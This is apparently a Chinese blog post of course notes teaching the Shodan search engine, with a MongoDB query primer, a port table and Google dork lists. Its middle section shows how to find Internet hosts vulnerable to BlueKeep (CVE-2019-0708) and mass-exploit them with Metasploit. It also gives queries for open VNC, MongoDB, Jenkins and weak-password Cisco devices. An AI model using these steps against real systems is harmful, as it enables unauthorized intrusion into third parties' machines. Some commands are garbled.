【渗透黑科技】shodan保姆级教程

声明: 学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负 搬运于: 本人

声明:

学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负


搬运于: 本人博客


学习笔记

shodan:(搜索引擎) https://www.shodan.io/

专门搜索网络设备

功能:在线查询功能,和离线的客户端,monitor(监控)可以监控一些ip地址,扫描出漏洞和bug,api接口调用

缺点:不够实时


一、安装

配置代理:

命令
shodan search --limit 10 country:jp
# 查找一些日本的IP地址  search:扫描  limit:规定数量 

shodan search --limit 10 --fields ip_str,post country:jp
# fileds: 过滤ip和端口(只看ip和端口信息),ip_str:以ipv4的形式输出ip地址

shodan search --color --limit 10 --fields ip_str port:3389 country:cn city:shenzhen
# color:加深颜色

shodan host ip
# 查看ip信息

fields ip_str,port
# 过滤ip信息

--limit 10
# 显示信息数量

--color
# 深色表示

os:windows7
# 操作系统

has_vuln:True
#漏洞   

device:weicam
# 设备:摄像头

device:router
# 设备:路由器

tp-link
# web端的一些设备

查漏洞:

cve-2019-0708

当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

若要利用此漏洞,攻击者需要通过 RDP 向目标系统远程桌面服务发送经特殊设计的请求。

可以看到其中利用的RDP即远程桌面端口3389,RDP协议,所带来的危害是不可估量的,当达到预想中的任意执行的攻击效果,后续利用便多种多样起来了。

复现:

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
# 16进制漏洞特征
# 将ip地址保存至0708.txt

shodan host ip
# 逐一检查第一步查出来的ip是否存在`cve-2019-0708`漏洞

使用远程桌面连接:

msf批量利用漏洞:

# 打开msf
msfconsole

# 进入0708.txt上级文件夹,批量查找漏洞
search 0708

# 进入脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

show options
#看payload,ip端口,show target

# 拖入ip地址文件
set rhost file: ...

check
download
shodan download-h

show download filename --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
parse
shodan parse filename

#解压
shodan parse filename1 >filename2
count
shodan count '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
# 在 honeyscore.shodan.io 里查看是否位蜜罐 
host
shodan host ip --history
# 查看ip的历史数据
vnc空密码连接(危险!)
shodan search --limit 10 --fields ip_str "authentication disabled" port:5900

尝试使用VNC连接:

shodan download --limit 100 "authentication disabled" port:5900
shodan myip
# 查看自己的出口ip,哪个地址连接的公网
shodan search --limit 10 --fileds ip_str,port http.titli:hacked by
# 查看已经被黑的网站

shodan search --limit 10 --fields ip_str,port "cisco -authorized port:23" 
# authorized:未授权访问的特征参数
# 该条命令可以查找cisco有弱口令特征的ip
shodan search --limit 10 --fields ip_str,port net:208.22.24.0/24
# net:搜索网段

shodan search --limit 10 --fields ip_str,port org:nsa.gov
# org: 组织

shodan search --limit 10 --fields ip_str,port hostname:google
# 查找网址所在组织的ip

shodan search --limit 10 --fields ip_str,port country:cn http.waf:safedog
# 查找装了安全狗的网站

shodan search --limit 10 --fields ip_str,port http.html:login

shodan search --limit 10 --fields ip_str "Mongodb server information -authentication" port:27017

shodan search --limit 10 --fields ip_str "X-Jenkins" OR "Set-cookie:JESSONID" http.title:"Dashboard"
# "X-Jenkins"OR"Set-cookie:JSESSIONID":这是搜索条件,意味着搜索结果中要么响应头包含“X-Jenkins”,要么“Set-cookie'”的值包含“JSESSIONID”。使用0R逻辑运算符连接了这两个条件,扩大了搜索的范围

shodan search --limit 10 --fields ip_str,port product:Apache httpd
# 查找使用apache的web页面

Jenkins(概念篇):Jenkins 简介_ron jenkins 什么意思-CSDN博客

Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目(持续部署),无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。

Jenkins 是一个可扩展的持续集成引擎。

MongDB:
  • nosql
  • 文档型(以文档方式存储数据)
MongDBMySQL
databasedatabase
集合(collection)table
文档 documentrow
字段 filedcolumn
索引 indexindex
_idprimary key
$lookupjoin
$groupgroup by

下载:mongdb

GUI: mongdb for vscode

连接:mongdb://ip:27017

基础语法

# 查看当前数据库
show databases/show dbs

# 切换数据库
use 数据库名

# 创建集合
db.集合名称.insertOne({name:"tiantian"})

# 查询集合中的数据
db.集合名称.find()
db.集合名称.find().limit(1)
db.集合名称.find({name:"tiantian"},{lever:1}) #查询name为tiantian的字段,返回他的_id和level值
db.集合名称.find({level:{$gt:3}}) #查询等级大于三的用户 ($gt:> , $lt:< , $eq:=)
db.集合名称.find({level:{$gte:3,$lt:5}}) #大于等于3,小于5
db.集合名称.find({$and:[{level:{$gte:3}},{level:{$lt:5}}]}) #同理还有$or,$not
db.集合名称.find({name:{$regex://,$options:'i'}}) #$regex:正则表达式查询,$options:'i':忽略大小写
db.集合名称.find({level:{$in:1,2,3}}) #查询等级为1,2,3的用户
db.集合名称.find({email:{$exists:true}}) # 查询有邮箱的用户 

db.集合名称.findOne({level:{$gte:3}}) #查询满足条件的一条数据
db.集合名称.updateOne({level:1},{$set:{name:"wangwu"}}) #更新一条数据,updateMany(...)
db.集合名称.deleteOne({level:1})

# 排序查询(1:升序,-1:降序)
db.集合名称.find().sort({level:1,name:1})
db.集合名称.find().sort({level:1,name:1}).limit(2).skip(1)  #跳过第一条数据

# 插入多条数据到集合中
db.集合名称.insertMany([{name:"zhangsan"},{name:"lisi",sex="女"}])

#聚合
db.集合名称.countDocuments() #统计文档数量
db.集合名称.countDocuments({level:{$gte:3}}) 

shodan的图形化界面

搜索漏洞'"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

摄像头:webcam

截图:has_screenshot:true cisco (联动3389端口 =v= )

shodan domain www.baidu
# 查看域名的信息

#shodan--》非实时,实时--》scan
shodan scan submit ip #类似nmap
shodan scan list #查看扫描信息

# 统计中国使用了ssl的ip,并用版本做一个统计
shodan stats --facets ssl.version country:cn has_ssl:true http

常见端口及服务:

portserver
80HTTP
3306MySQL
443HTTPS
21FTP
22SSH
25SMTP
110pop3
143IMAP
53DNS
5432PostgreSQL数据库服务器
3389RDP(远程桌面协议)
69TFTP
137-139NetBIOS
67-68DHCP
Google搜索语法
inurl:admin

inurl:login

inurl:php?id=

inurl:asp?id=

inurl:jsp?id=



filetype:pdf 关键词

filetype:doc 关键词

filetype:xls 关键词



site:gov inurl:upload

site:edu inurl:forum

site: inurl:phpmyadmin

site: inurl:password

site: inurl:backup

site:.gov intitle:敏感信息

site:pany inurl:confidential  # 机密

site:.domaininurl:uploads

site:.edu filetype:ppt

site:*.gov inurl:vulnerability

发布者:admin,转转请注明出处:http://www.yc00.com/web/1738011888a4010979.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信